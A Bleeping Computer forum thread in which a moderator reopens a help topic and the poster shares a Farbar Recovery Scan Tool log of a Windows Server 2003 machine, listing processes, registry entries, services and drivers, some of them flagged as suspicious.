  • 12,578 posts
  • Gender:Male

Posted 28 May 2017 - 06:45 PM

Hello again!

I haven't heard from you in 5 days. Therefore, I am going to assume that you no longer need our help, and close this topic.

If you do still need help, please send a Private Message to any Moderator within the next five days. Be sure to include a link to your topic in your Private Message.

Thank you for using Bleeping Computer, and have a great day!

Mod Edit: Topic reopened per OP request rec'd via PM - Hamluis.


Edited by hamluis, 02 June 2017 - 09:38 AM.


#6 jtcote

jtcote
  • Topic Starter

  • Members
  • 4 posts

Posted 02 June 2017 - 10:18 AM

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 14-05-2017
Ran by Administrator (administrator) on IVR02 (01-06-2017 17:06:27)
Running from C:\Documents and Settings\Administrator.ART\Desktop\tools
Loaded Profiles: Administrator & Administrator (Available Profiles: Administrator & Administrator)
Platform: Microsoft Windows Server 2003 Service Pack 2 (X64) Language: English (United States)
Internet Explorer Version 8 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

Failed to access process -> smss.exe
Failed to access process -> csrss.exe
Failed to access process -> winlogon.exe
Failed to access process -> services.exe
Failed to access process -> lsass.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> spoolsv.exe
Failed to access process -> msdtc.exe
Failed to access process -> casdscsvc.exe
Failed to access process -> UnivAgent.exe
Failed to access process -> svchost.exe
Failed to access process -> IPROSetMonitor.exe
Failed to access process -> Ofant.exe
Failed to access process -> svchost.exe
Failed to access process -> tvnserver.exe
Failed to access process -> vmware-converter-a.exe
Failed to access process -> dirwatcher.exe
Failed to access process -> vmware-converter.exe
Failed to access process -> vmware-converter.exe
Failed to access process -> svchost.exe
Failed to access process -> vssvc.exe
Failed to access process -> alg.exe
Failed to access process -> java.exe
Failed to access process -> AgPkiMon.exe
Failed to access process -> wmiprvse.exe
Failed to access process -> splunkweb.exe
Failed to access process -> splunkd.exe
Failed to access process -> csrss.exe
Failed to access process -> winlogon.exe
Failed to access process -> rdpclip.exe
Failed to access process -> explorer.exe
Failed to access process -> wmiprvse.exe
Failed to access process -> tvnserver.exe
Failed to access process -> ctfmon.exe
Failed to access process -> ctfmon.exe
Failed to access process -> vcs.exe
Failed to access process -> logon.scr
Failed to access process -> svchost.exe
Failed to access process -> rundll32.exe
Failed to access process -> cmd.exe
Failed to access process -> FRST64.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [tvncontrol] => C:\Program Files\TightVNC\tvnserver.exe [1725408 2017-03-14] (GlavSoft LLC.)
HKLM-x32\...\Winlogon: [Userinit] userinit,
Winlogon\Notify\crypt32chain: C:\WINDOWS\system32\crypt32.dll (Microsoft Corporation)
Winlogon\Notify\cryptnet: C:\WINDOWS\system32\cryptnet.dll (Microsoft Corporation)
Winlogon\Notify\cscdll: C:\WINDOWS\system32\cscdll.dll (Microsoft Corporation)
Winlogon\Notify\dimsntfy: C:\WINDOWS\system32\dimsntfy.dll (Microsoft Corporation)
Winlogon\Notify\ScCertProp: C:\WINDOWS\system32\wlnotify.dll (Microsoft Corporation)
Winlogon\Notify\Schedule: C:\WINDOWS\system32\wlnotify.dll (Microsoft Corporation)
Winlogon\Notify\sclgntfy: C:\WINDOWS\system32\sclgntfy.dll (Microsoft Corporation)
Winlogon\Notify\SensLogn: C:\WINDOWS\system32\WlNotify.dll (Microsoft Corporation)
Winlogon\Notify\termsrv: C:\WINDOWS\system32\wlnotify.dll (Microsoft Corporation)
Winlogon\Notify\wlballoon: C:\WINDOWS\system32\wlnotify.dll (Microsoft Corporation)
Winlogon\Notify\crypt32chain: C:\WINDOWS\system32\crypt32.dll [2015-06-26] (Microsoft Corporation)
Winlogon\Notify\cryptnet: C:\WINDOWS\system32\cryptnet.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\cscdll: C:\WINDOWS\system32\cscdll.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\dimsntfy: C:\WINDOWS\system32\dimsntfy.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\EFS: C:\WINDOWS\system32\sclgntfy.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\ScCertProp: C:\WINDOWS\system32\wlnotify.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\Schedule: C:\WINDOWS\system32\wlnotify.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\sclgntfy: C:\WINDOWS\system32\sclgntfy.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\SensLogn: C:\WINDOWS\system32\WlNotify.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\wlballoon: C:\WINDOWS\system32\wlnotify.dll [2007-02-18] (Microsoft Corporation)
HKLM\...\Policies\Explorer: [ShowSuperHidden] 1
HKLM\...\Command Processor:  <======= ATTENTION
HKLM-x32\...\Command Processor:  <======= ATTENTION
HKU\S-1-5-19\...\RunOnce: [tscuninstall] => C:\WINDOWS\system32\tscupgrd.exe [62464 2007-02-18] (Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [tscuninstall] => C:\WINDOWS\system32\tscupgrd.exe [62464 2007-02-18] (Microsoft Corporation)
HKU\S-1-5-21-2052111302-57989841-725345543-500\...\Run: [ctfmon.exe] => C:\WINDOWS\system32\ctfmon.exe [20992 2007-02-18] (Microsoft Corporation)
HKU\S-1-5-21-2052111302-57989841-725345543-500\Control Panel\Desktop\\SCRNSAVE.EXE ->
HKU\S-1-5-21-2969604724-871335673-3114479108-1007\...\Run: [ctfmon.exe] => C:\WINDOWS\system32\ctfmon.exe [20992 2007-02-18] (Microsoft Corporation)
HKU\S-1-5-21-2969604724-871335673-3114479108-1007\...\Policies\system: [DisableTaskMgr] 1
HKU\S-1-5-21-2969604724-871335673-3114479108-500\...\Run: [ctfmon.exe] => C:\WINDOWS\system32\ctfmon.exe [20992 2007-02-18] (Microsoft Corporation)
HKU\S-1-5-21-2969604724-871335673-3114479108-500\Control Panel\Desktop\\SCRNSAVE.EXE ->
HKU\S-1-5-18\...\RunOnce: [tscuninstall] => C:\WINDOWS\system32\tscupgrd.exe [62464 2007-02-18] (Microsoft Corporation)
IFEO\Your Image File Name Here without a path: [Debugger] ntsd -d
Lsa: [Notification Packages] RASSFM KDCSVC WDIGEST scecli
SecurityProviders: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll
SSODL: PostBootReminder - {7849596a-48ea-486e-8937-a2a3009f31a9} - %SystemRoot%\system32\SHELL32.dll (Microsoft Corporation)
SSODL: CDBurn - {fbeb8a05-beee-4442-804e-409d6c4515e9} - %SystemRoot%\system32\SHELL32.dll (Microsoft Corporation)
SSODL: SysTray - {35CEC8A3-2BE6-11D2-8773-92E220524153} - C:\WINDOWS\system32\stobject.dll (Microsoft Corporation)
SSODL-x32: PostBootReminder - {7849596a-48ea-486e-8937-a2a3009f31a9} - %SystemRoot%\syswow64\SHELL32.dll (Microsoft Corporation)
SSODL-x32: CDBurn - {fbeb8a05-beee-4442-804e-409d6c4515e9} - %SystemRoot%\syswow64\SHELL32.dll (Microsoft Corporation)
SSODL-x32: SysTray - {35CEC8A3-2BE6-11D2-8773-92E220524153} - C:\WINDOWS\SysWOW64\stobject.dll (Microsoft Corporation)
ShellExecuteHooks: URL Exec Hook - {AEB6717E-7E19-11d0-97EE-00C04FD91972} - C:\WINDOWS\system32\shell32.dll [10512384 2015-02-18] (Microsoft Corporation)
ShellExecuteHooks-x32: URL Exec Hook - {AEB6717E-7E19-11d0-97EE-00C04FD91972} - C:\WINDOWS\system32\shell32.dll [10512384 2015-02-18] (Microsoft Corporation)
Startup: C:\Documents and Settings\Administrator.ART\Start Menu\Programs\Startup\Prophecy System Tray.lnk [2013-11-14]
ShortcutTarget: Prophecy System Tray.lnk -> C:\Program Files\Voxeo\Prophecy\ProphecySysTray.exe (Voxeo Corporation)
Startup: C:\Documents and Settings\Administrator.ART\Start Menu\Programs\Startup\Prophecy System Tray.lnk [2013-11-14]
ShortcutTarget: Prophecy System Tray.lnk -> C:\Program Files\Voxeo\Prophecy\ProphecySysTray.exe (Voxeo Corporation)
BootExecute: autocheck autochk * sdnclean64.exe
GroupPolicy\User: Restriction <======= ATTENTION
GroupPolicyScripts: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecPolicy{37dd8956-8de4-46d2-abc4-90098777d79b} <======= ATTENTION (Restriction - IP)
Winsock: Catalog5 03 C:\WINDOWS\SysWOW64\mswsock.dll [233472 2011-03-03] (Microsoft Corporation) ATTENTION: LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5-x64 03 C:\Windows\System32\mswsock.dll [492544 2011-03-03] (Microsoft Corporation) ATTENTION: LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Tcpip\..\Interfaces\{C3E0C66F-BDEA-43BB-85C9-E83C3F24C615}: [NameServer] 10.10.10.230,10.10.10.231

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-2052111302-57989841-725345543-500\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/
HKU\S-1-5-21-2052111302-57989841-725345543-500\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-2969604724-871335673-3114479108-1007\Software\Microsoft\Internet Explorer\Main,Start Page = res://iesetup.dll/softAdmin.htm
HKU\S-1-5-21-2969604724-871335673-3114479108-500\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-2969604724-871335673-3114479108-500\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?}
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?}
SearchScopes: HKU\S-1-5-21-2969604724-871335673-3114479108-1007 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://search.live.com/results.aspx?q={searchTerms}&src=IE-SearchBox&Form=IE8SRC
SearchScopes: HKU\S-1-5-21-2969604724-871335673-3114479108-500 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://search.live.com/results.aspx?q={searchTerms}&src=IE-SearchBox&Form=IE8SRC
Toolbar: HKU\S-1-5-21-2052111302-57989841-725345543-500 -> &Address - {01E04581-4EEE-11D0-BFE9-00AA005B4383} - C:\WINDOWS\system32\browseui.dll [2015-04-08] (Microsoft Corporation)
Toolbar: HKU\S-1-5-21-2052111302-57989841-725345543-500 -> &Links - {0E5CBF21-D15F-11D0-8301-00AA005B4383} - C:\WINDOWS\system32\SHELL32.dll [2015-02-18] (Microsoft Corporation)
Toolbar: HKU\S-1-5-21-2969604724-871335673-3114479108-500 -> &Address - {01E04581-4EEE-11D0-BFE9-00AA005B4383} - C:\WINDOWS\system32\browseui.dll [2015-04-08] (Microsoft Corporation)
Toolbar: HKU\S-1-5-21-2969604724-871335673-3114479108-500 -> &Links - {0E5CBF21-D15F-11D0-8301-00AA005B4383} - C:\WINDOWS\system32\SHELL32.dll [2015-02-18] (Microsoft Corporation)
Filter: Class Install Handler - {32B533BB-EDAE-11d0-BD5A-00AA00B92AF1} - C:\WINDOWS\system32\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter-x32: Class Install Handler - {32B533BB-EDAE-11d0-BD5A-00AA00B92AF1} - C:\WINDOWS\SysWOW64\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\system32\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\SysWOW64\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\system32\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\SysWOW64\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter: lzdhtml - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\system32\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter-x32: lzdhtml - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\SysWOW64\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter: text/webviewhtml - {733AC4CB-F1A4-11d0-B951-00A0C90312E1} - C:\WINDOWS\system32\SHELL32.dll [2015-02-18] (Microsoft Corporation)
Filter-x32: text/webviewhtml - {733AC4CB-F1A4-11d0-B951-00A0C90312E1} - C:\WINDOWS\syswow64\SHELL32.dll [2015-02-18] (Microsoft Corporation)

FireFox:
========
FF DefaultProfile: tw6axcd9.default
FF ProfilePath: C:\Documents and Settings\Administrator.ART\Application Data\Mozilla\Firefox\Profiles\tw6axcd9.default [2017-06-01]
FF Plugin: @t.garena.com/garenatalk -> C:\Program Files (x86)\Garena Plus\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll [No File]
FF Plugin HKU\S-1-5-21-2052111302-57989841-725345543-500: @citrixonline.com/appdetectorplugin -> C:\Documents and Settings\Administrator.ART\Local Settings\Application Data\Citrix\Plugins\104\npappdetector.dll [2013-12-20] (Citrix Online)

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AeLookupSvc; C:\WINDOWS\SysWOW64\aelupsvc.dll [26624 2007-02-18] (Microsoft Corporation)
S4 Alerter; C:\WINDOWS\system32\alrsvc.dll [29696 2007-02-18] (Microsoft Corporation)
R2 AudioSrv; C:\WINDOWS\SysWOW64\audiosrv.dll [41472 2007-02-18] (Microsoft Corporation)
R2 Browser; C:\WINDOWS\SysWOW64\browser.dll [78336 2012-09-12] (Microsoft Corporation)
R2 CASDiscovery; C:\Program Files (x86)\CA\SharedComponents\ARCserve Backup\CADS\casdscsvc.exe [439624 2011-11-21] (CA)
R2 CASUniversalAgent; C:\Program Files\CA\SharedComponents\ARCserve Backup\UniAgent\UnivAgent.exe [1063240 2011-11-21] (CA)
S4 ClipSrv; C:\WINDOWS\system32\clipsrv.exe [49664 2007-02-18] (Microsoft Corporation)
S4 ClipSrv; C:\WINDOWS\SysWOW64\clipsrv.exe [32256 2007-02-18] (Microsoft Corporation)
S3 Dfs; C:\WINDOWS\system32\Dfssvc.exe [321024 2007-02-18] (Microsoft Corporation)
S3 Dfs; C:\WINDOWS\SysWOW64\Dfssvc.exe [164864 2007-02-18] (Microsoft Corporation)
S3 dmadmin; C:\WINDOWS\System32\dmadmin.exe [399872 2007-02-18] (Microsoft Corporation)
R2 dmserver; C:\WINDOWS\System32\dmserver.dll [37376 2007-02-18] (Microsoft Corporation)
R2 Dnscache; C:\WINDOWS\SysWOW64\dnsrslvr.dll [45568 2011-03-03] (Microsoft Corporation)
R2 ERSvc; C:\WINDOWS\System32\ersvc.dll [31744 2007-02-18] (Microsoft Corporation)
R2 Eventlog; C:\WINDOWS\system32\services.exe [227840 2009-03-19] (Microsoft Corporation)
R2 helpsvc; C:\WINDOWS\PCHealth\HelpCtr\Binaries\pchsvc.dll [77312 2007-02-18] (Microsoft Corporation)
S3 HTTPFilter; C:\WINDOWS\System32\w3ssl.dll [21504 2007-02-18] (Microsoft Corporation)
S3 HTTPFilter; C:\WINDOWS\SysWOW64\w3ssl.dll [15360 2007-02-18] (Microsoft Corporation)
S3 IASJet; C:\WINDOWS\SysWOW64\iasrecst.dll [162816 2007-02-18] (Microsoft Corporation)
S4 ImapiService; C:\WINDOWS\system32\imapi.exe [265728 2007-02-18] (Microsoft Corporation)
S2 Iprip; C:\WINDOWS\Temp\ntshrui.dll [6656 2007-02-18] (Microsoft Corporation)
S4 IsmServ; C:\WINDOWS\System32\ismserv.exe [60416 2007-02-18] (Microsoft Corporation)
S4 IsmServ; C:\WINDOWS\SysWOW64\ismserv.exe [40448 2007-02-18] (Microsoft Corporation)
S4 kdc; C:\WINDOWS\System32\lsass.exe [14336 2007-02-18] (Microsoft Corporation)
S4 LicenseService; C:\WINDOWS\System32\llssrv.exe [191488 2007-02-18] (Microsoft Corporation)
S4 LicenseService; C:\WINDOWS\SysWOW64\llssrv.exe [94720 2007-02-18] (Microsoft Corporation)
R2 LmHosts; C:\WINDOWS\SysWOW64\lmhsvc.dll [19968 2007-02-18] (Microsoft Corporation)
S4 mnmsrvc; C:\WINDOWS\SysWOW64\mnmsrvc.exe [32768 2007-02-18] (Microsoft Corporation)
S4 NetDDE; C:\WINDOWS\system32\netdde.exe [160768 2007-02-18] (Microsoft Corporation)
S4 NetDDE; C:\WINDOWS\SysWOW64\netdde.exe [110080 2007-02-18] (Microsoft Corporation)
S4 NetDDEdsdm; C:\WINDOWS\system32\netdde.exe [160768 2007-02-18] (Microsoft Corporation)
S4 NetDDEdsdm; C:\WINDOWS\SysWOW64\netdde.exe [110080 2007-02-18] (Microsoft Corporation)
R3 Netman; C:\WINDOWS\SysWOW64\netman.dll [263680 2007-02-18] (Microsoft Corporation)
R3 Nla; C:\WINDOWS\System32\mswsock.dll [492544 2011-03-03] (Microsoft Corporation)
R3 Nla; C:\WINDOWS\SysWOW64\mswsock.dll [233472 2011-03-03] (Microsoft Corporation)
S3 NtFrs; C:\WINDOWS\system32\ntfrs.exe [1158144 2007-02-18] (Microsoft Corporation)
S3 NtFrs; C:\WINDOWS\SysWOW64\ntfrs.exe [792064 2007-02-18] (Microsoft Corporation)
S3 NtLmSsp; C:\WINDOWS\system32\lsass.exe [14336 2007-02-18] (Microsoft Corporation)
R2 OpenFileAgent; C:\Program Files (x86)\CA\ARCserve Backup Agent for Open Files\Ofant.exe [148808 2011-11-21] (CA)
R2 PlugPlay; C:\WINDOWS\system32\services.exe [227840 2009-03-19] (Microsoft Corporation)
R2 PolicyAgent; C:\WINDOWS\system32\lsass.exe [14336 2007-02-18] (Microsoft Corporation)
R3 RasMan; C:\WINDOWS\SysWOW64\rasmans.dll [181760 2007-02-18] (Microsoft Corporation)
S3 RDSessMgr; C:\WINDOWS\system32\sessmgr.exe [212480 2007-02-18] (Microsoft Corporation)
R2 RemoteRegistry; C:\WINDOWS\SysWOW64\regsvc.dll [69120 2007-02-18] (Microsoft Corporation)
S3 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [118520 2013-02-28] (Riverbed Technology, Inc.)
S3 RSoPProv; C:\WINDOWS\system32\RSoPProv.exe [103424 2007-02-18] (Microsoft Corporation)
S3 RSoPProv; C:\WINDOWS\SysWOW64\RSoPProv.exe [67072 2007-02-18] (Microsoft Corporation)
S3 SCardSvr; C:\WINDOWS\System32\SCardSvr.exe [166400 2007-02-18] (Microsoft Corporation)
S3 SCardSvr; C:\WINDOWS\SysWOW64\SCardSvr.exe [90112 2007-02-18] (Microsoft Corporation)
R2 Schedule; C:\WINDOWS\SysWOW64\schedsvc.dll [202240 2007-02-18] (Microsoft Corporation)
R2 seclogon; C:\WINDOWS\SysWOW64\seclogon.dll [18432 2007-02-18] (Microsoft Corporation)
S4 stisvc; C:\WINDOWS\SysWOW64\wiaservc.dll [348160 2007-02-18] (Microsoft Corporation)
S2 SysmonLog; C:\WINDOWS\system32\smlogsvc.exe [133120 2007-02-18] (Microsoft Corporation)
S2 SysmonLog; C:\WINDOWS\SysWOW64\smlogsvc.exe [96256 2007-02-18] (Microsoft Corporation)
S4 TlntSvr; C:\WINDOWS\system32\tlntsvr.exe [113152 2007-02-18] (Microsoft Corporation)
R2 TrkWks; C:\WINDOWS\SysWOW64\trkwks.dll [86528 2007-02-18] (Microsoft Corporation)
S4 Tssdis; C:\WINDOWS\System32\tssdis.exe [99840 2007-02-18] (Microsoft Corporation)
R2 tvnserver; C:\Program Files\TightVNC\tvnserver.exe [1725408 2017-03-14] (GlavSoft LLC.)
S3 UMWdf; C:\WINDOWS\system32\wdfmgr.exe [62976 2007-02-18] (Microsoft Corporation)
S3 UMWdf; C:\WINDOWS\SysWOW64\wdfmgr.exe [39424 2007-02-18] (Microsoft Corporation)
S3 UPS; C:\WINDOWS\System32\ups.exe [34816 2007-02-18] (Microsoft Corporation)
S3 UPS; C:\WINDOWS\SysWOW64\ups.exe [16896 2007-02-18] (Microsoft Corporation)
R2 vmware-converter-agent; C:\Program Files (x86)\VMware\VMware vCenter Converter Standalone\vmware-converter-a.exe [479960 2014-10-03] (VMware, Inc.)
R2 vmware-converter-server; C:\Program Files (x86)\VMware\VMware vCenter Converter Standalone\vmware-converter.exe [479960 2014-10-03] (VMware, Inc.)
R2 vmware-converter-worker; C:\Program Files (x86)\VMware\VMware vCenter Converter Standalone\vmware-converter.exe [479960 2014-10-03] (VMware, Inc.)
R3 vphone; C:\Program Files\Voxeo\Prophecy\Prophecy.exe [340992 2013-07-18] (Voxeo Corporation) [File not signed]
R3 vprism; C:\Program Files\Voxeo\Prophecy\Prophecy.exe [340992 2013-07-18] (Voxeo Corporation) [File not signed]
R3 vserver; C:\Program Files\Voxeo\Prophecy\Prophecy.exe [340992 2013-07-18] (Voxeo Corporation) [File not signed]
R2 W32Time; C:\WINDOWS\SysWOW64\w32time.dll [227328 2007-02-18] (Microsoft Corporation)
S3 WmdmPmSN; C:\WINDOWS\SysWOW64\mspmsnsv.dll [25088 2007-02-18] (Microsoft Corporation)
R2 wuauserv; C:\WINDOWS\system32\wuauserv.dll [12288 2007-02-18] (Microsoft Corporation)
R2 WZCSVC; C:\WINDOWS\System32\wzcsvc.dll [659968 2007-02-18] (Microsoft Corporation)
R2 WZCSVC; C:\WINDOWS\SysWOW64\wzcsvc.dll [489472 2007-02-18] (Microsoft Corporation)
S4 appmgmt; C:\Documents and Settings\All Users\Application Data\Storm\update\%SESSIONNAME%\vndtf.cc3 [X]
R3 WinHttpAutoProxySvc; winhttp.dll [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S4 Abiosdsk; no ImagePath
S4 ACPIEC; C:\Windows\System32\Drivers\ACPIEC.sys [18432 2007-02-18] (Microsoft Corporation)
S4 adpu160m; no ImagePath
S4 adpu320; no ImagePath
S4 aic78u2; no ImagePath
S4 aic78xx; no ImagePath
S4 AliIde; no ImagePath
S4 AmdIde; no ImagePath
S4 arc; no ImagePath
S4 Atdisk; no ImagePath
S3 Atmarpc; C:\WINDOWS\System32\DRIVERS\atmarpc.sys [106496 2007-02-18] (Microsoft Corporation)
R3 audstub; C:\WINDOWS\System32\DRIVERS\audstub.sys [5632 2005-03-24] (Microsoft Corporation)
S3 bmdrvr; C:\Windows\SysWow64\drivers\bmdrvr.sys [75344 2013-08-28] (VMware, Inc.)
R2 CdaC15BA; C:\WINDOWS\System32\DRIVERS\CdaC15BA.sys [13312 2007-02-18] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.)
R2 CdaD10BA; C:\WINDOWS\System32\DRIVERS\CdaD10BA.sys [13312 2007-02-18] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.)
S1 Changer; no ImagePath
S4 ClusDisk; C:\WINDOWS\System32\DRIVERS\ClusDisk.sys [112640 2007-02-18] (Microsoft Corporation)
S4 CmdIde; no ImagePath
S4 cpqcissm; no ImagePath
R0 DfsDriver; C:\WINDOWS\System32\drivers\Dfs.sys [52736 2007-02-18] (Microsoft Corporation)
S4 dmboot; C:\WINDOWS\System32\drivers\dmboot.sys [415232 2007-02-18] (Microsoft Corporation)
R0 dmio; C:\WINDOWS\System32\drivers\dmio.sys [244224 2007-02-18] (Microsoft Corporation)
R0 dmload; C:\WINDOWS\System32\drivers\dmload.sys [9216 2007-02-18] (Microsoft Corporation)
S4 dpti2o; no ImagePath
R3 e1express; C:\WINDOWS\System32\DRIVERS\e1e5132e.sys [349568 2012-10-30] (Intel Corporation)
S4 elxstor; no ImagePath
R1 Fips; C:\Windows\System32\Drivers\Fips.sys [50176 2007-02-18] (Microsoft Corporation)
R0 Ftdisk; C:\WINDOWS\System32\DRIVERS\ftdisk.sys [240128 2007-02-18] (Microsoft Corporation)
R3 Gpc; C:\WINDOWS\System32\DRIVERS\msgpc.sys [71168 2007-02-18] (Microsoft Corporation)
S4 hpcisss; no ImagePath
S1 i2omgmt; no ImagePath
S4 iirsp; no ImagePath
S1 imapi; C:\WINDOWS\System32\DRIVERS\imapi.sys [72704 2007-02-18] (Microsoft Corporation)
S4 IntelIde; no ImagePath
R0 ioatdma; C:\WINDOWS\System32\Drivers\ioatdma.sys [46792 2009-11-16] (Intel Corporation)
S3 Ip6Fw; C:\WINDOWS\System32\DRIVERS\Ip6Fw.sys [57856 2007-02-18] (Microsoft Corporation)
R1 IPSec; C:\WINDOWS\System32\DRIVERS\ipsec.sys [156672 2007-02-18] (Microsoft Corporation)
U3 LicenseInfo; no ImagePath
S4 lp6nds35; no ImagePath
S1 mbamchameleon; C:\WINDOWS\system32\drivers\mbamchameleon.sys [121560 2017-05-18] (Malwarebytes)
R1 mnmdd; C:\Windows\System32\Drivers\mnmdd.sys [8192 2007-02-18] (Microsoft Corporation)
S4 mraid35x; no ImagePath
S4 nfrd960; no ImagePath
R2 NPF; C:\WINDOWS\System32\drivers\npf.sys [36600 2013-02-28] (Riverbed Technology, Inc.)
R2 OFADriver; C:\WINDOWS\system32\drivers\ofant.sys [187984 2011-11-21] (CA)
S3 PDCOMP; no ImagePath
S3 PDFRAME; no ImagePath
S3 PDRELI; no ImagePath
S3 PDRFRAME; no ImagePath
R3 Ptilink; C:\WINDOWS\System32\DRIVERS\ptilink.sys [31232 2007-02-18] (Parallel Technologies, Inc.)
S4 ql2300; no ImagePath
R3 Raspti; C:\WINDOWS\System32\DRIVERS\raspti.sys [31232 2007-02-18] (Microsoft Corporation)
S1 redbook; C:\WINDOWS\System32\DRIVERS\redbook.sys [64000 2005-03-24] (Microsoft Corporation)
U5 sacdrv; C:\Windows\System32\Drivers\sacdrv.sys [130560 2007-02-18] (Microsoft Corporation)
U5 ScsiPort; C:\WINDOWS\system32\drivers\scsiport.sys [171008 2007-02-18] (Microsoft Corporation)
S4 Simbad; no ImagePath
S4 symc8xx; no ImagePath
S4 symmpi; no ImagePath
S4 sym_hi; no ImagePath
S4 sym_u3; no ImagePath
S4 TosIde; no ImagePath
S4 ultra; no ImagePath
R3 Update; C:\WINDOWS\System32\DRIVERS\update.sys [152576 2007-05-30] (Microsoft Corporation)
S4 ViaIde; no ImagePath
R2 vstor2-mntapi20-shared; C:\Windows\SysWow64\drivers\vstor2-mntapi20-shared.sys [33872 2013-08-28] (VMware, Inc.)
S3 WDICA; no ImagePath
S3 WLBS; C:\WINDOWS\System32\DRIVERS\wlbs.sys [280576 2007-02-18] (Microsoft Corporation)
R1 ZAM; C:\WINDOWS\System32\drivers\zam64.sys [203680 2017-05-15] (Zemana Ltd.)
R1 ZAM_Guard; C:\WINDOWS\System32\drivers\zamguard64.sys [203680 2017-05-15] (Zemana Ltd.)
S3 efavdrv; \??\C:\WINDOWS\system32\drivers\efavdrv.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
U1 WS2IFSL; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

NETSVC: Sacsvr -> no filepath.
NETSVC: TrkSvr -> no filepath.
NETSVCx32: Browser -> C:\Windows\SysWOW64\browser.dll (Microsoft Corporation)
NETSVCx32: CryptSvc -> C:\Windows\SysWOW64\cryptsvc.dll (Microsoft Corporation)
NETSVCx32: DMServer -> C:\Windows\SysWOW64\dmserver.dll ==> No File
NETSVCx32: EventSystem -> C:\WINDOWS\SysWOW64\es.dll (Microsoft Corporation)
NETSVCx32: HidServ -> C:\Windows\SysWOW64\hidserv.dll ==> No File
NETSVCx32: Iprip -> C:\WINDOWS\Temp\ntshrui.dll (Microsoft Corporation)
NETSVCx32: LanmanWorkstation -> C:\Windows\SysWOW64\wkssvc.dll ==> No File
NETSVCx32: Messenger -> no filepath.
NETSVCx32: Netman -> C:\Windows\SysWOW64\netman.dll (Microsoft Corporation)
NETSVCx32: Sacsvr -> no filepath.
NETSVCx32: Seclogon -> C:\Windows\SysWOW64\seclogon.dll (Microsoft Corporation)
NETSVCx32: TrkWks -> C:\Windows\SysWOW64\trkwks.dll (Microsoft Corporation)
NETSVCx32: TrkSvr -> no filepath.
NETSVCx32: WZCSVC -> C:\Windows\SysWOW64\wzcsvc.dll (Microsoft Corporation)
NETSVCx32: xmlprov -> no filepath.

